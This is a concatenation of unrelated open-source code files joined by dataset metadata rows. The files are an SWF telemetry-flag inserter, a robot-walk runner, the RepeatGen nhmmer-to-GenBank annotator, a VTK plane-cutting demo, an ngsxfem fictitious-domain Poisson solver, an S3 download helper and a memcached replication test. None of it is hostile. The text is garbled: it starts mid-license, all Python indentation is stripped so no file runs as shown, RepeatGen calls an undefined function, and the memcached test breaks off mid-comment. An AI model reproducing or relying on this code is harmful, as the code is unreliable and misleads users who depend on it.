# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''See readme or run with no args for usage'''
import os
import sys
import tempfile
import shutil
import struct
import zlib
import hashlib
import inspect
supportsLZMA = False
try:
import pylzma
supportsLZMA = True
except:
pass
####################################
# Helpers
####################################
class stringFile(object):
def __init__(self, data):
self.data = data
def read(self, num=-1):
result = self.data[:num]
self.data = self.data[num:]
return result
def close(self):
self.data = None
def flush(self):
pass
def consumeSwfTag(f):
tagBytes = ""
recordHeaderRaw = f.read(2)
tagBytes += recordHeaderRaw
if recordHeaderRaw == "":
raise Exception("Bad SWF: Unexpected end of file")
recordHeader = struct.unpack("BB", recordHeaderRaw)
tagCode = ((recordHeader[1] & 0xff) << 8) | (recordHeader[0] & 0xff)
tagType = (tagCode >> 6)
tagLength = tagCode & 0x3f
if tagLength == 0x3f:
ll = f.read(4)
longlength = struct.unpack("BBBB", ll)
tagLength = ((longlength[3]&0xff) << 24) | ((longlength[2]&0xff) << 16) | ((longlength[1]&0xff) << 8) | (longlength[0]&0xff)
tagBytes += ll
tagBytes += f.read(tagLength)
return (tagType, tagBytes)
def outputInt(o, i):
o.write(struct.pack('I', i))
def outputTelemetryTag(o, passwordClear):
lengthBytes = 2 # reserve
if passwordClear:
sha = hashlib.sha256()
sha.update(passwordClear)
passwordDigest = sha.digest()
lengthBytes += len(passwordDigest)
# Record header
code = 93
if lengthBytes >= 63:
o.write(struct.pack('<HI', code << 6 | 0x3f, lengthBytes))
else:
o.write(struct.pack('<H', code << 6 | lengthBytes))
# Reserve
o.write(struct.pack('<H', 0))
# Password
if passwordClear:
o.write(passwordDigest)
####################################
# main()
####################################
if __name__ == "__main__":
####################################
# Parse command line
####################################
if len(sys.argv) < 2:
print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe())))
print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.")
sys.exit(-1)
infile = sys.argv[1]
passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None
####################################
# Process SWF header
####################################
swfFH = open(infile, 'rb')
signature = swfFH.read(3)
swfVersion = swfFH.read(1)
struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file
if signature == "FWS":
pass
elif signature == "CWS":
decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
elif signature == "ZWS":
if not supportsLZMA:
raise Exception("You need the PyLZMA package to use this script on \
LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/")
swfFH.read(4) # compressed length
decompressedFH = stringFile(pylzma.decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
else:
raise Exception("Bad SWF: Unrecognized signature: %s" % signature)
f = swfFH
o = tempfile.TemporaryFile()
o.write(signature)
o.write(swfVersion)
outputInt(o, 0) # FileLength - we'll fix this up later
# FrameSize - this is nasty to read because its size can vary
rs = f.read(1)
r = struct.unpack("B", rs)
rbits = (r[0] & 0xff) >> 3
rrbytes = (7 + (rbits*4) - 3) / 8;
o.write(rs)
o.write(f.read((int)(rrbytes)))
o.write(f.read(4)) # FrameRate and FrameCount
####################################
# Process each SWF tag
####################################
while True:
(tagType, tagBytes) = consumeSwfTag(f)
if tagType == 93:
raise Exception("Bad SWF: already has EnableTelemetry tag")
elif tagType == 92:
raise Exception("Bad SWF: Signed SWFs are not supported")
elif tagType == 69:
# FileAttributes tag
o.write(tagBytes)
# Look ahead for Metadata tag. If present, put our tag after it
(nextTagType, nextTagBytes) = consumeSwfTag(f)
writeAfterNextTag = nextTagType == 77
if writeAfterNextTag:
o.write(nextTagBytes)
outputTelemetryTag(o, passwordClear)
# If there was no Metadata tag, we still need to write that tag out
if not writeAfterNextTag:
o.write(nextTagBytes)
(tagType, tagBytes) = consumeSwfTag(f)
o.write(tagBytes)
if tagType == 0:
break
####################################
# Finish up
####################################
# Fix the FileLength header
uncompressedLength = o.tell()
o.seek(4)
o.write(struct.pack("I", uncompressedLength))
o.flush()
o.seek(0)
# Copy the temp file to the outFile, compressing if necessary
outFile = open(infile, "wb")
if signature == "FWS":
shutil.copyfileobj(o, outFile)
else:
outFile.write(o.read(8)) # File is compressed after header
if signature == "CWS":
outFile.write(zlib.compress(o.read()))
elif signature == "ZWS":
compressed = pylzma.compress(o.read())
outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field
outFile.write(compressed)
else:
assert(false)
outFile.close()
if passwordClear:
print("Added opt-in flag with encrypted password " + passwordClear)
else:
print("Added opt-in flag with no password")
| gpl-3.0 | 1,561,226,999,871,632,100 | 30.941667 | 132 | 0.594834 | false | 3.949511 | false | false | false |
aguirrea/lucy | tests/testBalieroWalk.py | 1 | 2371 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Andrés Aguirre Dorelo
# MINA/INCO/UDELAR
#
# Execution of individuals resulted from the Baliero and Pias work
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import glob
import os
import sys
import time
from configuration.LoadSystemConfiguration import LoadSystemConfiguration
from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix
from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid
from Individual import Individual
balieroProp = DTIndividualPropertyBaliero()
physicalProp = DTIndividualPropertyPhysicalBioloid()
conf = LoadSystemConfiguration()
BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files")
arguments = len(sys.argv)
def createIndividual(filename):
if int(conf.getProperty("Lucy simulated?"))==1:
walk = Individual(balieroProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
else:
walk = Individual(physicalProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
return walk
walk = Individual(balieroProp, DTIndividualGeneticMatrix()) #dummy individual to initialise the simulator and enable the time step configuration
walk.execute()
print "please set the proper time step in vrep"
time.sleep(5)
if arguments > 1:
files = sys.argv[1:]
for filename in files:
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
else:
for filename in glob.glob(os.path.join(BalieroDir, '*.xml')):
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
| gpl-3.0 | 1,704,087,821,725,901,800 | 36.03125 | 144 | 0.745992 | false | 3.910891 | false | false | false |
nikolaichik/SigmoID | Python/RepeatGen.py | 1 | 23652 | import sys
import argparse
from time import process_time
import Bio
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from decimal import *
class MySeqFeature(SeqFeature):
def __str__(self):
out = "type: %s\n" % self.type
if self.strand == 1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '+')
if self.strand == -1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '-')
if self.id and self.id != "<unknown id>":
out += "id: %s\n" % self.id
out += "qualifiers:\n"
for qual_key in sorted(self.qualifiers):
out += " Key: %s, Value: %s\n" % (qual_key,
self.qualifiers[qual_key])
if Bio.__version__ != '1.68': # to avoid problems with diff biopython versions
if not hasattr(self, "_sub_features"):
self._sub_features = []
if len(self._sub_features) != 0:
out += "Sub-Features\n"
for sub_feature in self._sub_features:
out += "%s\n" % sub_feature
return out
def is_within_feature(list_of_features, index, some_hit):
# 'index' is for feature's index within 'list_of_features'
if (list_of_features[index].location.start <
some_hit.location.start <
list_of_features[index].location.end or
list_of_features[index].location.start <
some_hit.location.end <
list_of_features[index].location.end) or \
(list_of_features[index].location.start <
some_hit.location.start <
some_hit.location.end <
list_of_features[index+1].location.start and \
list_of_features[index].strand == +1 and \
list_of_features[index].strand !=
list_of_features[index+1].strand):
# checking if hit is within other features or is between two convergent ones.
return True
else:
return False
def is_within_boundary(list_of_features, index, some_hit):
for feature in list_of_features[index:]:
if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1):
if (list_of_features[index].location.start+enter.boundary > \
some_hit.location.end > \
list_of_features[index].location.start and \
list_of_features[index].strand == +1) or \
(list_of_features[index].location.end-enter.boundary < \
some_hit.location.start < \
list_of_features[index].location.end and \
list_of_features[index].strand == -1):
return True
else:
return False
else:
return False
def qualifiers_function(qualifiers, var):
qual_var = []
for some_qualifier in qualifiers:
if any(symbol == '#' for symbol in some_qualifier):
qual_var.append(some_qualifier.split('#'))
else:
sys.exit('Please check your general qualifiers typing')
for number in range(len(qual_var)):
value_list = []
for index in range(len(qual_var)):
if qual_var[number][0] == qual_var[index][0] and \
qual_var[index][1] not in value_list:
value_list.append(qual_var[index][1])
var[qual_var[number][0]] = value_list
return var
def nhmm_parser(path_to_file, max_model_length):
x = []
try:
a = open(path_to_file, 'r')
except IOError:
sys.exit('Open error! Please check your nhmmer report input file!')
r = a.readlines()
b = []
d = []
e = []
for index in range(len(r)):
d.append([])
if not r[index].startswith('#') or r[index].startswith('\n'):
item = r[index].split(' ')
if len(item) >= 2:
for part in item:
if part != '' and len(part) != 0:
part = part.replace('\n', '')
d[index].append(part)
for index in range(len(d)):
if len(d[index]) != 0:
b.append(d[index])
for index in range(len(b)):
if len(b[index]) <= 10:
for number in range(len(b[index])):
b[index+1].insert(number, b[index][number])
for index in range(len(b)):
if len(b[index]) > 10:
e.append(b[index])
for item in e:
for num_of_spaces in range(len(e[0])):
# to avoid problems with additional spaces... e[0] - firstly \
# splitted string by ' '
try:
x.append([item[8+num_of_spaces],
item[9+num_of_spaces],
int(item[11+num_of_spaces]+'1'),
float(item[12+num_of_spaces]),
float(item[13+num_of_spaces]),
item[0+num_of_spaces],
item[1+num_of_spaces],
int(item[4+num_of_spaces]),
int(item[5+num_of_spaces]),
int(item[6+num_of_spaces]),
int(item[7+num_of_spaces])
])
if max_model_length is False:
max_model_length = int(item[5+num_of_spaces])
elif max_model_length is not False and \
int(item[5+num_of_spaces]) > max_model_length:
max_model_length = int(item[5+num_of_spaces])
else:
pass
except ValueError:
pass
else:
break
return [x, max_model_length]
def nhmm_prog(path_to_file, e):
a = open(path_to_file, 'r')
r = a.readlines()
prog_list = []
for prog_line in r:
if prog_line.startswith('# Program:') or \
prog_line.startswith('# Version:'):
prog_list.append(prog_line)
prog_list = [item.split(' ') for item in prog_list]
for item in prog_list:
for piece in item:
if piece != '':
e.append(piece)
return
def sorting_output_features(lst):
bit_score_list = []
for some_feature in lst:
for key in some_feature.qualifiers.keys():
if key == 'note':
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score_list.append(float(temp[-3]))
return bit_score_list
def score_parser(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers['note']) != list:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
elif key == 'note' and type(some_feature.qualifiers['note']) == list:
for note in some_feature.qualifiers['note']:
if note.startswith('nhmmer'):
temp = note
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
def output(score_list, output_features):
for val in score_list:
for some_feature in output_features:
if val == feature_score(some_feature):
print (some_feature)
output_features = [f for f in output_features if f != some_feature]
def feature_score(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers[key]) != []:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
return float(temp[-3])
def dna_topology(path, topo_list):
# This function deals with with DNA topology problem in biopython
# for more detail: https://github.com/biopython/biopython/issues/363
infile = open(path, 'r')
loci_counter = -1 # because 1 is 0 in python
lines = infile.readlines()
for numline in range(len(lines)):
if lines[numline].startswith('LOCUS'):
loci_counter += 1
lines[numline] = topo_list[loci_counter]
infile.close()
return lines
def createparser():
parser = argparse.ArgumentParser(
prog='RepeatGen',
usage='\n%(prog)s <report_file> <input_file> <output_file> [options]',
description='''This script allows to add features to a genbank \
file according to nhmmer results.\
Requires Biopython 1.64 (or newer)''',
epilog='(c) Aliaksandr Damienikan, 2018.')
parser.add_argument('report_file',
help='path to nhmmer report file produced with \
-tblout option.')
parser.add_argument('input_file',
help='path to input Genbank file.')
parser.add_argument('output_file', help='path to output Genbank file.')
parser.add_argument('-L', '--length',
default=False,
help='annotate features of specified length (range of lengths).',
metavar='<int>/<int:int>',
required=False,
type=str)
parser.add_argument('-q', '--qual',
default='',
metavar='<key#"value">',
nargs='*',
dest='qual',
help='''add this qualifier to each annotated \
feature.''')
parser.add_argument('-p', '--palindromic',
action='store_const',
const=True,
default=False,
help='''filter palindromic repeats.''')
parser.add_argument('-E', '--eval',
default=False,
type=float,
metavar='<float or integer>',
help='''threshold E-Value.''')
parser.add_argument('-S', '--score',
default=False,
type=float,
metavar='<float or integer>',
help='''threshold Bit Score.''')
parser.add_argument('-c', '--coverage',
default=0.5,
type=float,
metavar='<float>',
help='''minimal coverage for input model (default is 0.5)''')
parser.add_argument('-i', '--insert',
action='store_const',
const=True,
default=False,
help='''don't add features inside CDS.''')
parser.add_argument('-a', '--alilen',
type=int,
default=False,
metavar='<integer>',
help='''set profile alignment length (the largest hmm_to if not specified).''')
parser.add_argument('-b', '--boundary',
type=int,
default=0,
metavar='<integer>',
help='''set allowed length boundary for hits being within features.''')
parser.add_argument('-d', '--duplicate',
action='store_const',
const=True,
default=False,
help='''no duplicate features with the same location \
and the same rpt_family qualifier
value.''')
parser.add_argument('-v', '--version',
action='version',
version='%(prog)s 1.3 (April 6, 2021)')
parser.add_argument('-f', '--feature',
metavar='<"feature key">',
default='unknown type',
help='''feature key to add (promoter, protein_bind \
etc.)''')
return parser
t_start = process_time()
args = createparser()
enter = args.parse_args()
arguments = sys.argv[1:0]
max_eval = enter.eval
if enter.length is not False:
enter.length = enter.length.split(':')
if len(enter.length) == 1:
enter.min_length = False
enter.max_length = int(enter.length[0])
else:
enter.min_length = int(enter.length[0])
enter.max_length = int(enter.length[1])
if not 0 <= enter.coverage <= 1:
sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range')
try:
from Bio import SeqIO
except ImportError:
sys.exit('\nYou have no Biopython module installed!\n\
You can download it here for free: \
http://biopython.org/wiki/Download\n')
try:
input_handle = open(enter.input_file, 'r')
except IOError:
sys.exit('Open error! Please check your genbank input file!')
circular_vs_linear = []
for line in input_handle.readlines():
if line.startswith('LOCUS'):
circular_vs_linear.append(line)
input_handle.close()
input_handle = open(enter.input_file, 'r')
if enter.input_file == enter.output_file:
sys.exit('Sorry, but we can\'t edit input file. Plese give another name \
to output file!')
try:
output_handle = open(enter.output_file, 'w')
except IOError:
sys.exit('Open error! Please check your genbank output path!')
print ('\nRepeatGen 1.0 (January 6, 2018)')
print ("="*50)
print ('Options used:\n')
for arg in range(1, len(sys.argv)):
print (sys.argv[arg])
file_path = enter.report_file
qualifier = {'CHECK': 'CHECKED!'}
qualifiers_function(enter.qual, qualifier)
prog = []
maxlen = 0
parser_result = nhmm_parser(file_path, maxlen)
allign_list = parser_result[0]
if enter.alilen is False:
model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used
else:
model_length = enter.alilen
nhmm_prog(file_path, prog)
prog[2] = prog[2].replace('\r', '')
records = SeqIO.parse(input_handle, 'genbank')
allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA']
total = 0
for record in records:
print ('\n' + "-"*50 + "\nCONTIG: " + record.id)
print ('\n FEATURES ADDED: \n')
allowed_features_list = []
for feature in record.features:
if feature.type in allowed_types:
allowed_features_list.append(feature)
try:
cds_loc_start = allowed_features_list[0]
except:
cds_loc_start = record.features[0]
try:
cds_loc_end = allowed_features_list[-1]
except:
cds_loc_end = record.features[-1]
for allign in allign_list:
from Bio import SeqFeature
if allign[2] == +1:
env_start = int(allign[0]) #env_from
env_end = int(allign[1]) #env_to
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
ali_start = allign[9]
ali_end = allign[10]
ali_diff = ali_end - ali_start
else:
env_start = int(allign[1]) #env_to
env_end = int(allign[0]) #env_from
strnd = int(allign[2])
e_value = float(allign[3])
score = allign[4]
locus = allign[5]
version = allign[6]
hmm_from = allign[7]
hmm_to = allign[8]
hmm_diff = hmm_to - hmm_from
getcontext().prec = 4
hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length)
ali_start = allign[10]
ali_end = allign[9]
ali_diff = ali_end - ali_start
start_pos = SeqFeature.ExactPosition(env_start-1)
end_pos = SeqFeature.ExactPosition(env_end)
feature_length = env_end - (env_start-1)
feature_location = FeatureLocation(start_pos, end_pos)
feature_type = enter.feature
from Bio.SeqFeature import SeqFeature
note_qualifier = dict()
note_qualifier['note'] = str('%s score %s E-value %s' %
(prog[2].replace('\n', ''),
score,
e_value))
my_feature = MySeqFeature(
location=feature_location,
type=feature_type,
strand=strnd,
qualifiers=dict(list(qualifier.items()) +
list(note_qualifier.items())))
if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \
(
(enter.min_length != 0 and enter.min_length <= feature_length <= enter.max_length) or \
(enter.min_length == False and feature_length == enter.max_length) \
) and \
(score >= enter.score or enter.score is False):
for i in reversed(range(len(record.features))):
if record.features[i].location.start < \
my_feature.location.start and \
(enter.eval is False or e_value <= enter.eval or
enter.score is not False):
for c in range(len(allowed_features_list)-1):
if allowed_features_list[c].location.start <= \
my_feature.location.start <= \
allowed_features_list[c+1].location.start:
record.features.insert(i+1, my_feature)
break
break
if i == 0 and \
record.features[i].location.start > \
my_feature.location.start:
record.features.insert(i, my_feature)
break
if i == len(record.features)-1 and \
record.features[i].location.start < \
my_feature.location.start:
record.features.insert(i+1, my_feature)
break
repeats = []
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \
enter.duplicate is True) or enter.duplicate is False:
repeats.append([feature, record.features.index(feature)])
if enter.insert:
hit_list = []
for i in range(len(record.features)):
if 'CHECK' in record.features[i].qualifiers.keys():
hit_list.append(record.features[i])
for i in reversed(range(len(hit_list))):
i = len(hit_list)-1-i
for n in range(len(allowed_features_list)-1):
if (
is_within_feature(allowed_features_list,
n,
hit_list[i]) and \
not is_within_boundary(allowed_features_list,
n,
hit_list[i])
) or \
wrong_promoter_strand(allowed_features_list[n],
hit_list[i],
allowed_features_list[n+1]):
hit_list.pop(i)
break
for i in reversed(range(len(record.features))):
if 'CHECK' in record.features[i].qualifiers.keys() and \
not any(record.features[i] == hit for hit in hit_list):
record.features.pop(i)
if enter.palindromic:
del_counter = 0
deleted = []
for feature in repeats:
if feature not in deleted:
for n in range(repeats.index(feature)+1, len(repeats)):
further = repeats[n][0]
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys():
del record.features[feature[1]-del_counter]
del_counter += 1
deleted.append(feature)
elif enter.duplicate is True:
if further.location.strand != feature[0].location.strand and \
0 <= (further.location.start-feature[0].location.start) <= 2 and \
0 <= (further.location.end-feature[0].location.end) <= 2 and \
'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \
'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys():
del record.features[repeats[n][1]-del_counter]
del_counter += 1
deleted.append(further)
if enter.duplicate is True and \
'rpt_family' in qualifier.keys():
repeats = []
del_counter = 0
for feature in record.features:
if 'rpt_family' in feature.qualifiers.keys():
if feature.qualifiers['rpt_family'] == qualifier['rpt_family']:
repeats.append([feature, record.features.index(feature)])
for repeat in repeats:
for n in range(repeats.index(repeat)+1, len(repeats)):
further_repeat = repeats[n][0]
if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \
0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \
repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']:
if score_parser(repeat[0]) >= \
score_parser(further_repeat):
del record.features[repeat[1]-del_counter]
elif score_parser(repeat[0]) < \
score_parser(further_repeat):
del record.features[repeats[n][0]-del_counter]
del_counter += 1
break
output_features = []
for feature in record.features:
if 'CHECK' in feature.qualifiers.keys():
del feature.qualifiers['CHECK']
output_features.append(feature)
score_list = sorting_output_features(output_features)
score_list.sort()
output(score_list, output_features)
print ('\nFeatures added:', len(output_features))
print ('\n' + "-"*50)
SeqIO.write(record, output_handle, 'genbank')
total += int(len(output_features))
output_handle.close()
newlines = dna_topology(enter.output_file, circular_vs_linear)
new_output_file = open(enter.output_file, 'w')
new_output_file.writelines(newlines)
new_output_file.close()
input_handle.close()
t_end = process_time()
print ('Total features: ', total)
print ('CPU time: {0:.3f} sec'.format(t_end-t_start))
print ('\n' + "="*50)
| gpl-3.0 | -6,934,267,850,099,133,000 | 41.085409 | 109 | 0.50723 | false | 4.087798 | false | false | false |
lorensen/VTKExamples | src/Python/VisualizationAlgorithms/Cutter.py | 1 | 1710 | #!/usr/bin/env python
# A simple script to demonstrate the vtkCutter function
import vtk
def main():
colors = vtk.vtkNamedColors()
# Create a cube
cube = vtk.vtkCubeSource()
cube.SetXLength(40)
cube.SetYLength(30)
cube.SetZLength(20)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
# create a plane to cut,here it cuts in the XZ direction (xz normal=(1,0,0);XY =(0,0,1),YZ =(0,1,0)
plane = vtk.vtkPlane()
plane.SetOrigin(10, 0, 0)
plane.SetNormal(1, 0, 0)
# create cutter
cutter = vtk.vtkCutter()
cutter.SetCutFunction(plane)
cutter.SetInputConnection(cube.GetOutputPort())
cutter.Update()
cutterMapper = vtk.vtkPolyDataMapper()
cutterMapper.SetInputConnection(cutter.GetOutputPort())
# create plane actor
planeActor = vtk.vtkActor()
planeActor.GetProperty().SetColor(colors.GetColor3d("Yellow"))
planeActor.GetProperty().SetLineWidth(2)
planeActor.SetMapper(cutterMapper)
# create cube actor
cubeActor = vtk.vtkActor()
cubeActor.GetProperty().SetColor(colors.GetColor3d("Aquamarine"))
cubeActor.GetProperty().SetOpacity(0.3)
cubeActor.SetMapper(cubeMapper)
# create renderers and add actors of plane and cube
ren = vtk.vtkRenderer()
ren.AddActor(planeActor)
ren.AddActor(cubeActor)
# Add renderer to renderwindow and render
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren.SetBackground(colors.GetColor3d("Silver"))
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
| apache-2.0 | 636,900,238,253,238,100 | 26.580645 | 103 | 0.693567 | false | 3.392857 | false | false | false |
ngsxfem/ngsxfem | demos/fictdom_mlset.py | 1 | 4537 | """
In this example we solve an unfitted Poisson problem similar to the one in
`fictdom.py`, however this time with the unfitted geometry being the
unit square. This example shall illustrate the functionality of ngsxfem to
solve PDE problems on geometries described via multiple level set functions.
PDE problem + Discretisation + Geometry + Implementation aspects:
-----------------------------------------------------------------
* As in fictdom.py except for the different geometry and its handling.
Used Features:
--------------
* Quadrature with respect to multiple level set functions., see the
'mlset_pde' jupyter tutorial.
* MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial.
* DomainTypeArray convenience layer, see the 'mlset_basic' jupyter
tutorial.
* Restricted BilinearForm, jupyter tutorial `basics`.
* Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`.
"""
# ------------------------------ LOAD LIBRARIES -------------------------------
from netgen.geom2d import SplineGeometry
from ngsolve import *
from xfem import *
from xfem.mlset import *
ngsglobals.msg_level = 2
# -------------------------------- PARAMETERS ---------------------------------
# Domain corners
ll, ur = (-0.2, -0.2), (1.2, 1.2)
# Initial mesh diameter
initial_maxh = 0.4
# Number of mesh bisections
nref = 3
# Order of finite element space
k = 1
# Stabilization parameter for ghost-penalty
gamma_s = 0.5
# Stabilization parameter for Nitsche
gamma_n = 10
# ----------------------------------- MAIN ------------------------------------
# Set up the level sets, exact solution and right-hand side
def level_sets():
return [-y, x - 1, y - 1, -x]
nr_ls = len(level_sets())
u_ex = 16 * x * (1 - x) * y * (1 - y)
grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile())
rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile()
# Geometry and mesh
geo = SplineGeometry()
geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left"))
ngmesh = geo.GenerateMesh(maxh=initial_maxh)
for i in range(nref):
ngmesh.Refine()
mesh = Mesh(ngmesh)
# Level set and cut-information
P1 = H1(mesh, order=1)
lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls))
for i, lsetp1 in enumerate(lsetsp1):
InterpolateToP1(level_sets()[i], lsetp1)
Draw(lsetp1, mesh, "lsetp1_{}".format(i))
square = DomainTypeArray((NEG, NEG, NEG, NEG))
with TaskManager():
square.Compress(lsetsp1)
boundary = square.Boundary()
boundary.Compress(lsetsp1)
mlci = MultiLevelsetCutInfo(mesh, lsetsp1)
# Element and degrees-of-freedom markers
els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary}
facets_gp = BitArray(mesh.nedge)
hasneg = mlci.GetElementsWithContribution(square)
# Finite element space
Vhbase = H1(mesh, order=k, dgjumps=True)
Vh = Restrict(Vhbase, hasneg)
gfu = GridFunction(Vh)
hasif = mlci.GetElementsWithContribution(boundary)
Draw(BitArrayCF(hasif), mesh, "hasif")
for i, (dtt, els_bnd) in enumerate(els_if_singe.items()):
els_bnd[:] = mlci.GetElementsWithContribution(dtt)
Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i))
facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif,
use_and=True)
els_gp = GetElementsWithNeighborFacets(mesh, facets_gp)
Draw(BitArrayCF(els_gp), mesh, "gp_elements")
# Bilinear and linear forms of the weak formulation
u, v = Vh.TnT()
h = specialcf.mesh_size
normals = square.GetOuterNormals(lsetsp1)
# Set up the integrator symbols
dx = dCut(lsetsp1, square, definedonelements=hasneg)
ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt])
for dtt in boundary}
dw = dFacetPatch(definedonelements=facets_gp)
# Construct integrator
a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False)
a += InnerProduct(grad(u), grad(v)) * dx
for bnd, n in normals.items():
a += -InnerProduct(grad(u) * n, v) * ds[bnd]
a += -InnerProduct(grad(v) * n, u) * ds[bnd]
a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd]
a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw
f = LinearForm(Vh)
f += rhs * v * dx
# Assemble and solve the linear system
f.Assemble()
a.Assemble()
gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec
Draw(gfu, mesh, "uh")
# Post-processing
err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh))
err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)),
mesh))
print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
| lgpl-3.0 | 2,544,864,473,202,585,000 | 29.655405 | 79 | 0.648446 | false | 2.857053 | false | false | false |
selassid/canopener | canopener/s3file.py | 1 | 1324 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
import tempfile
from boto.s3.connection import S3Connection
def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None):
"""Mockable point for creating S3Connections."""
return S3Connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
class s3file(object):
def __new__(
cls,
filename,
mode='r',
aws_access_key_id=None,
aws_secret_access_key=None,
):
"""Opens a local copy of an S3 URL."""
parse = urlparse(filename)
if 'w' in mode:
raise ValueError("can't write to S3")
if parse.scheme != 's3':
raise ValueError("s3file can't open non-S3 URLs")
conn = make_s3_connection(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
bucket = conn.get_bucket(parse.netloc)
key = bucket.get_key(parse.path)
local_file = tempfile.TemporaryFile()
key.get_contents_to_file(local_file)
local_file.seek(0)
return local_file
| bsd-2-clause | -4,765,795,732,312,073,000 | 26.583333 | 75 | 0.616314 | false | 3.568733 | false | false | false |
hankshz/dockers | memcached/script/test-memcached.py | 1 | 1304 | #!/usr/bin/env python3
import time
from pymemcache.client.base import Client
master = Client(('memcached-master', 11211))
slave1 = Client(('memcached-slave1', 11211))
slave2 = Client(('memcached-slave2', 11211))
slave3 = Client(('memcached-slave3', 11211))
# Invalidate all
# mcrouter seems not work properly with pymemcache flush_all
slave1.flush_all()
slave2.flush_all()
slave3.flush_all()
# Set & Get from the master
master.set('a', '1')
assert(master.get('a') == b'1')
master.set('b', '2')
assert(master.get('b') == b'2')
master.set('c', '3')
assert(master.get('c') == b'3')
master.set('d', '4')
assert(master.get('d') == b'4')
# Get from the slave1, only string starts with 'a'
